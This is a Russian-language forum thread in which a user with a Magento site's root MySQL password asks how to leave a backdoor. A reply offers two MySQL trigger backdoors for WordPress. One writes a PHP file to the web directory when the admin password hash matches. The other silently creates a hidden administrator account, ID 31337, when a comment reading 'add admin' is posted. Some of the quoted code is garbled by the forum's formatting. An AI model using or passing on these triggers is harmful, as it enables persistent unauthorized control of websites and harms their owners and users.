 |
05.02.2017, 19:26
|
|
Познающий
Регистрация: 29.03.2012
Сообщений: 77
С нами:
7432886
Репутация:
0
|
|
Есть сайт магенто, в директории очень много файлов закритих, можно даже сказать что все. Ну не суть. Есть пароль к mysql рутовский, как оставить бекдор? Большое спасибо за ответы.
|
|
|
05.02.2017, 20:03
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами:
5344886
Репутация:
441
|
|
|
|
|
|
05.02.2017, 21:17
|
|
Познающий
Регистрация: 29.03.2012
Сообщений: 77
С нами:
7432886
Репутация:
0
|
|
Вот под wp ничего не получается у людей, хз что по магенто. ну попробую скажу.
Сообщение от None
DELIMITER //
CREATE TRIGGER backdoor AFTER UPDATE ON wp_users
FOR EACH ROW label:BEGIN
IF (SELECT user_pass FROM wp_users WHERE ID=1)=’$P$B9wcvAmi3JvyqJ5991Qif8LRgzSAfc.’ THEN
SELECT » INTO OUTFILE ‘site/smile.php’;
ELSE
LEAVE label;
END IF;
END;
//
DELIMITER ;
я бы подумал что руки кривые, но и у ребят с форума тоже нечего не получилось
DELIMITER //
CREATE TRIGGER `INSERT` BEFORE INSERT ON `wp_comments`
FOR EACH ROW BEGIN
IF NEW.comment_content = ‘add admin’ THEN
INSERT INTO `wp_users` ( `ID` , `user_login` , `user_pass` ) VALUES
(‘31337’, ‘root’, ‘$P$B9wcvAmi3JvyqJ5991Qif8LRgzSAfc.’);
INSERT INTO `wp_usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES
(‘31337’, ‘wp_capabilities’, ‘a:1:{s:13:»administrator»;s:1:»1″;}’),
(‘31337’, ‘admin_color’, ‘fresh’),
(‘31337’, ‘comment_shortcuts’, ‘false’),
(‘31337’, ‘rich_editing’, ‘true’),
(‘31337’, ‘nickname’, ‘root’),
(‘31337’, ‘first_name’, ‘
drtro.public@gmail.com
’),
(‘31337’, ‘wp_user_level’, ’10’);
END IF;
END
//
DELIMITER ; hnnps://xakep.ru/2011/11/22/57856/ - вот тут уже поинтересней. |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
